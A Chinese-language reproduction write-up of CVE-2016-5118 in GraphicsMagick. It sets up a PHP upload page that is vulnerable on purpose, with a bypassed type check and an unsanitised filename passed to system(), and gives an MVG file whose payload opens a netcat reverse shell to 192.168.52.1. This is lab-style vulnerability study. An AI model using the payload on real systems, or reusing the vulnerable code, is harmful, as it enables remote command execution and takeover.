GraphMagic Rce 漏洞复现
0x01 漏洞背景
漏洞编号:CVE-2016-5118
漏洞组件:GraphMagic
影响版本:
0x02 漏洞复现
环境源码如下,参考来源于https://www.runoob.com/php/php-file-upload.html
upload.html
<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>
<form action="upload_file.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
upload_file.php
<?php
// 允许上传的图片后缀
$allowedExts = array("gif", "jpeg", "jpg", "png","mvg");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp); // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png")
|| (true))
&& ($_FILES["file"]["size"] < 204800) // 小于 200 kb
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "错误:: " . $_FILES["file"]["error"] . "<br>";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"] . "<br>";
// 判断当前目录下的 upload 目录是否存在该文件
// 如果没有 upload 目录,你需要创建它,upload 目录权限为 777
if (file_exists("upload/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " 文件已经存在。 ";
}
else
{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "upload/" . $_FILES["file"]["name"];
}
}
$filename = "upload/".$_FILES["file"]["name"];
system("gm convert ".$filename." test");
}
else
{
echo "非法的文件格式";
}
?>
构造mvg格式的文件进行上传
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|nc -e /bin/sh 192.168.52.1 10000"
pop graphic-context
上传文件后调用php的system函数执行系统命令,调用gm convert对mvg文件进行处理,从而执行mvg文件中的命令。
